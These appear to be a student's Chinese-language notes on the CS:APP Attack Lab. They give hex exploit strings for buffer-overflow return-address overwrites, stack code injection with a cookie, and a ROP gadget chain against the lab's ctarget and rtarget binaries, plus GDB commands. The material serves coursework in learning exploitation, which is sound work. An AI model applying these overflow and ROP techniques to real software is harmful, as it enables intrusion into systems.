__ctarget__
栈固定
栈内存段可执行

0x4017a8 <getbuf>   分配40字节栈空间后栈地址rsp为0x5561dc78 
0x401968 <test>

0x4017c0 <touch1>
11 22 33 44 55 66 77 88 99 00   # 字符串覆盖地址缓冲区40字节
11 22 33 44 55 66 77 88 99 00
11 22 33 44 55 66 77 88 99 00
11 22 33 44 55 66 77 88 99 00
c0 17 40                        # touch1地址覆盖主调函数返回地址

0x4017ec <touch2>
48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi # 将cookie值存入参数1寄存器rdi
68 ec 17 40 00       	push   $0x4017ec        # 将touch2地址压栈
c3                   	ret                     # ret弹出栈值作为返回地址

48 c7 c7 fa 97 b9 59 68 ec 17   # 注入代码段字符
40 00 c3 11 22 33 44 55 66 77   # 填充字符
11 22 33 44 55 66 77 88 99 00
11 22 33 44 55 66 77 88 99 00
78 dc 61 55                     # 注入代码段字符所在栈地址

0x4018fa <touch3> # 虽然通过，或许重新考虑  
# 本次目标函数的被调函数使用rsp偏移，如果只是减少栈指针来确保注入代码不被覆盖，将引发异常
# 将要保存的代码段放在更改的返回地址后，即主调函数test栈中
# 考虑ret 或push 的空间是16还是8字节
如果在执行注入代码后ret到t3，由于之后的函数压栈，于是之前保存的字符串被覆盖
如果在执行代码中使rsp-0x**分配空间，似乎由于之后的函数对rsp值进行操作，引发异常终止
那么不应将字符串保存在rsp低地址，尝试保存在返回地址的高处
48 c7 c7 a8 dc 61 55 	mov    $0x5561dca8,%rdi # 字符串保存在修改后的ret地址高处
68 fa 18 40 00       	push   $0x4018fa        # 将touch3地址压栈
c3                   	ret

59b997fa cookie 对应ascii码字符串与末尾/0   
35 39 62 39 39 37 66 61 00

48 c7 c7 a8 dc 61 55 68 fa 18 # 注入代码字段
40 00 c3 11 22 33 44 55 66 77 
11 22 33 44 55 66 77 88 99 00 
11 22 33 44 55 66 77 88 99 00
78 dc 61 55 00 00 00 00 35 39 # 注入代码段字符所在栈地址 地址高位填充0
62 39 39 37 66 61 00          # 注入cookie字符串      

0x5561dc78 注入代码地址
0x5561dca8 进入t3时rsp地址

__rtarget__
栈随机化
栈内存段不可执行

寻找最后一个字节是0xc3的程序代码段
不只是完整的指令字节序列，还有字节序列的一部分

0x4017ec <touch2>
由于注入代码段不可执行
使用程序字节序列与注入代码的组合传递cookie值 0x59b997fa
程序字节序列将rdi寄存器的参数设置为cookie值
或程序字节序列弹出数据并设置寄存器值
之后ret
弹出注入代码输入的touch2地址

将注入数值 pop到rax
rax再将值保存到rdi 
58      popq    %rax
89 c7   movl    %eax,%rdi 
90      nop 
c3      ret

00000000004019a7 <addval_219>:
  4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax
  4019ad:	c3 
部分字节序列功能为：
    4019ab  58      popq    %rax
    4019ac  90      nop
    4019ad  c3      ret

00000000004019c3 <setval_426>:
  4019c3:	c7 07 48 89 c7 90    	movl   $0x90c78948,(%rdi)
  4019c9:	c3 
部分字节序列功能为：
    4019c6  89 c7   movl  %eax,%rdi
    4019c8  90      nop 
    4019c9	c3      ret 

程序地址0x4019ab -> 注入cookie值0x59b997fa 到rax -> 程序地址0x4019c6 rdi=eax -> touch2 地址0x4017ec

11 22 33 44 55 66 77 88     # 填充字符
11 22 33 44 55 66 77 88     
11 22 33 44 55 66 77 88
11 22 33 44 55 66 77 88
11 22 33 44 55 66 77 88
ab 19 40 00 00 00 00 00     # 程序段 弹出值到rax
fa 97 b9 59 00 00 00 00     # 弹出的值 rax得到此值
c6 19 40 00 00 00 00 00     # 程序段 rdi=eax
ec 17 40 00 00 00 00 00     # touch2地址


0x4018fa <touch3>   !!!! 之后再做
得到一个地址
在此地址pop存入等效于cookie字符串的值  
将此地址存入其他寄存器
再将rdi设置为此地址
存入touch3的地址

59b997fa cookie 对应ascii码字符串与末尾/0   
35 39 62 39 39 37 66 61 00
cookie读取时作为字符串，存入时按照字符串顺序
由于字符串末尾有/0终止符，存入时还需在地址+8处写入0
移动值时64位操作1次，或32位操作2次且第2次地址+4

直接使用地址或在farm里进行地址计算



gcc -c exp.s
objdump -d exp.o > exp_objd.s

cat exp.txt | ./hex2raw > exp_raw.txt

run -q -i exp_raw.txt
kill

break getbuf 
break *0x4017b4 //getbuf读取后
break *0x4017bd //getbuf即将ret
break *0x4018fa //t3
break *0x401850 //hex


delete

显示汇编代码
disas

step
stepi


p 格式 $寄存器
p /x (int)$rax
格式/x、/d、/t，分别表示16进制、十进制、二进制

p 格式 *地址
p /x *0x7ffffff8bcc0

p (char*) 0x5561dc97

p 格式 *(int *)($寄存器)
p /x *(int*)($rsp)


x/格式 地址
x /s 0x5561dc97
x /x $rsp
x /6gx 0x000000 //6个g(8)字节内容

info registers
